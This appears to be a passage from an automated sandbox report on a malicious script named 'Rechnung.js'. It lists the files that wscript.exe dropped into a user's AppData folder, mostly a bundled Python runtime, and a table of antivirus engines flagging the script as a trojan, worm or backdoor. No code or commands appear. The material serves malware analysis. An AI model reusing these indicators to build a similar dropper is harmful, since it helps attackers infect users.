file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\cp1252.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\enum.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\ado_consts.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\argparse.cpython-37.pyc

The process wscript.exe wrote an executable file to disk (50 out of 66 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-profile-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_ctypes.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\select.pyd
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tcl86t.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_ARC4.cp37-win32.pyd

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

MicroWorld-eScan	JS:Trojan.Cryxos.3662
FireEye	JS:Trojan.Cryxos.3662
CAT-QuickHeal	VBS.Agent.34768
McAfee	VBS/Autorun.worm.aaha
Sangfor	Trojan.Generic-JS.Save.b6586d32
Cyren	JS/Agent.AGG4!Eldorado
Symantec	Trojan.Gen.NPE
ESET-NOD32	JS/Vjworm.CD
Avast	JS:ADODB-BL [Expl]
ClamAV	Txt.Packed.Cryxos-7111887-0
Kaspersky	Trojan.Script.Agent.br
BitDefender	JS:Trojan.Cryxos.3662
NANO-Antivirus	Trojan.Script.Dropper.foxxbq
Tencent	Heur:Trojan.Script.LS_Gencirc.7223621.0
Ad-Aware	JS:Trojan.Cryxos.3662
Emsisoft	JS:Trojan.Cryxos.3662 (B)
Comodo	Worm.JS.Vjworm.AK@8cyo73
DrWeb	PowerShell.Packed.25
TrendMicro	HEUR_JSRANSOM.O4
McAfee-GW-Edition	BehavesLike.VBS.Dropper.cj
Microsoft	Trojan:VBS/Irsaz.B
Arcabit	JS:Trojan.Cryxos.DE4E
GData	JS:Trojan.Cryxos.3662
AhnLab-V3	Backdoor/JS.Agent.S1250
MAX	malware (ai score=88)
Rising	Backdoor.Houdini/JS!1.C2BA (CLASSIC)
Fortinet	JS/Agent.BM!tr
AVG	JS:ADODB-BL [Expl]

Rechnung.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All